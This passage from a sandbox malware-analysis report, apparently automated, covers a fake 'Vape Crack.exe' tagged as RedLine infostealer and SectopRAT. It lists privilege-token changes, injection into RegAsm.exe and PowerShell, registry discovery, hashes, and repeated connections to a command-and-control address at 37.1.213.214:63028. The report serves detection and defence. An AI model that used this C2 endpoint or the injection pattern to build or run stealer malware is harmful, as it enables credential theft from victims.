Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RegAsm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1636 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1636 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1636 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1636 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1636 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1636 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1636 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1636 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1636 wrote to memory of 11756 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 1636 wrote to memory of 11756 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 1636 wrote to memory of 11756 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 1636 wrote to memory of 11756 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 1636 wrote to memory of 11756 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 1636 wrote to memory of 11756 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 1636 wrote to memory of 11756 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 1636 wrote to memory of 11756 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 1636 wrote to memory of 11756 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 1636 wrote to memory of 11756 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 1636 wrote to memory of 11756 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 1636 wrote to memory of 11756 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe

"C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection 8.8.8.8

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection 8.8.8.8

C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 dns.google udp
US 37.1.213.214:63028 tcp
US 37.1.213.214:63028 tcp
US 37.1.213.214:63028 tcp
US 37.1.213.214:63028 tcp

Files

memory/1636-0-0x0000000074DCE000-0x0000000074DCF000-memory.dmp

memory/1636-1-0x0000000000350000-0x00000000003AC000-memory.dmp

memory/1636-2-0x0000000074DC0000-0x00000000754AE000-memory.dmp

memory/1200-5-0x0000000002970000-0x00000000029B0000-memory.dmp

memory/1636-6-0x0000000074DCE000-0x0000000074DCF000-memory.dmp

memory/1636-7-0x0000000074DC0000-0x00000000754AE000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KRC02O6IUKGLZGQQE61M.temp

MD5 17984f44880547c633aaa045d4cc8d28
SHA1 018ef977dce56c2b143228f334002a87f7d1bb31
SHA256 91349d976beb92ff111f28f378d7853e69287d6bf6a39e4a2444390df715300b
SHA512 b7a44e89ccba516be6440992c9c1423f57b50d12d2de681f6eaa166116f070c4c6a735e47e7c45d639dd64a425c93c79d8463f7eeed885c97f8dfc3bdc3bf0d6

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 bad4aa35d2377b6a2906fadea728c258
SHA1 813663aabd6cd88bdff1958e48b950dea5a19046
SHA256 70c07d9167df0163ef649aae6c055c0504eb6dfc77755603cc8440d118aac3e5
SHA512 93a102a177a5ecf6b6f58543d712e579505eb231542858dbe078ab46c3c971b11ccf461ea41a0bae8d7efdfb5f2f0e3683eb214dbd889da9ac562c5de383a6fe

memory/1636-13-0x0000000004050000-0x00000000040A6000-memory.dmp

memory/1636-14-0x0000000004FC0000-0x0000000005040000-memory.dmp

memory/1636-40-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-78-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-76-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-74-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-72-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-70-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-68-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-66-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-64-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-62-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-60-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-58-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-56-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-54-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-52-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-50-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-48-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-46-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-44-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-42-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-38-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-36-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-34-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-32-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-30-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-28-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-26-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-24-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-22-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-20-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-18-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-16-0x0000000004FC0000-0x000000000503A000-memory.dmp

memory/1636-15-0x0000000004FC0000-0x000000000503A000-memory.dmp

\Users\Admin\AppData\Local\Temp\RegAsm.exe

MD5 b58b926c3574d28d5b7fdd2ca3ec30d5
SHA1 d260c4ffd603a9cfc057fcb83d678b1cecdf86f9
SHA256 6e70b56d748c4ccab13cc8a055d3795ea0dd95fe3b70568d7d3ac0c6621140a3
SHA512 b13cb998822b716b695013bcd6dec62a2290567d0d1743b2d982ca084235cf69c6ea1fc91c9d4e62657c6f9e102c7c60e81296ab055ffe43b887c5f8ec8958ab

memory/1636-2517-0x0000000074DC0000-0x00000000754AE000-memory.dmp

memory/11756-2516-0x0000000000400000-0x000000000041E000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win10v2004-20241007-en

Max time kernel

139s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

System Binary Proxy Execution: Regsvcs/Regasm

defense_evasion
Description Indicator Process Target
Key opened \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe N/A
File created C:\Users\Admin\AppData\Local\Temp\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RegAsm.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2228 set thread context of 6056 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RegAsm.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2228 wrote to memory of 508 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 508 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 508 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 6056 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 2228 wrote to memory of 6056 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 2228 wrote to memory of 6056 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 2228 wrote to memory of 6056 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 2228 wrote to memory of 6056 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 2228 wrote to memory of 6056 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 2228 wrote to memory of 6056 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 2228 wrote to memory of 6056 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe

"C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection 8.8.8.8

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection 8.8.8.8

C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 72.209.201.84.in-addr.arpa udp
US 37.1.213.214:63028 tcp
US 37.1.213.214:63028 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 37.1.213.214:63028 tcp
US 37.1.213.214:63028 tcp

Files

memory/2228-0-0x0000000074C9E000-0x0000000074C9F000-memory.dmp

memory/2228-1-0x0000000000870000-0x00000000008CC000-memory.dmp

memory/2228-2-0x00000000058A0000-0x0000000005E44000-memory.dmp

memory/2228-3-0x00000000052F0000-0x0000000005382000-memory.dmp

memory/2228-4-0x00000000052C0000-0x00000000052CA000-memory.dmp

memory/2228-5-0x0000000074C90000-0x0000000075440000-memory.dmp

memory/508-6-0x0000000002620000-0x0000000002656000-memory.dmp

memory/508-7-0x0000000074C90000-0x0000000075440000-memory.dmp

memory/508-8-0x0000000005240000-0x0000000005868000-memory.dmp

memory/508-9-0x0000000074C90000-0x0000000075440000-memory.dmp

memory/508-10-0x0000000074C90000-0x0000000075440000-memory.dmp

memory/508-11-0x0000000005170000-0x0000000005192000-memory.dmp

memory/508-13-0x00000000058E0000-0x0000000005946000-memory.dmp

memory/508-12-0x0000000005870000-0x00000000058D6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1gn1pe0c.fyf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/508-14-0x0000000005950000-0x0000000005CA4000-memory.dmp

memory/508-24-0x0000000005F50000-0x0000000005F6E000-memory.dmp

memory/508-25-0x0000000005FD0000-0x000000000601C000-memory.dmp

memory/508-26-0x0000000006F30000-0x0000000006FC6000-memory.dmp

memory/508-27-0x0000000006420000-0x000000000643A000-memory.dmp

memory/508-28-0x0000000006470000-0x0000000006492000-memory.dmp

memory/508-29-0x00000000081B0000-0x000000000882A000-memory.dmp

memory/508-32-0x0000000074C90000-0x0000000075440000-memory.dmp

memory/2228-33-0x0000000074C9E000-0x0000000074C9F000-memory.dmp

memory/2228-34-0x0000000074C90000-0x0000000075440000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 6832ae680e8ddacc9752c84ff4ee94d5
SHA1 eba38e3a46f6a27ec29c567c6766ba57fe7954ba
SHA256 19c4f3bc855b449022b1baf50569236e2d844e3f323453291495de125f76e632
SHA512 9cea7dcd3b0bf6bb6c1fd15aea43312cb52926e2e61455fcb26a6dd82323e352b9960f4afe412891be2aba54230ef354772e5397df8c6100e5aab875247fa1ef

memory/944-36-0x0000000074C90000-0x0000000075440000-memory.dmp

memory/944-37-0x0000000074C90000-0x0000000075440000-memory.dmp

memory/944-47-0x00000000054F0000-0x0000000005844000-memory.dmp

memory/944-48-0x0000000074C90000-0x0000000075440000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 055d49baa3f0709efb430f24f1f50269
SHA1 d04930cf95b31ae01fbfaedc237447c3ec9a6121
SHA256 93827dc1e9f7bbd451485b0b959c04df96a8b814c608373c166634c78aef27f4
SHA512 838d417e29646ab93ac5d8ec4f698174a81391cf477889ea660b5b812aaf84860454c6b36725092085297ad892c976bb045f6a94df7477a98b08a94da28f6033

memory/944-51-0x0000000074C90000-0x0000000075440000-memory.dmp

memory/2228-52-0x00000000064C0000-0x0000000006516000-memory.dmp

memory/2228-53-0x0000000006510000-0x0000000006590000-memory.dmp

memory/2228-54-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-71-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-115-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-113-0x0000000006510000-0x000000000658A000-memory.dmp

memory/2228-111-0x0000000006510000-0x000000000658A000-memory.dmp

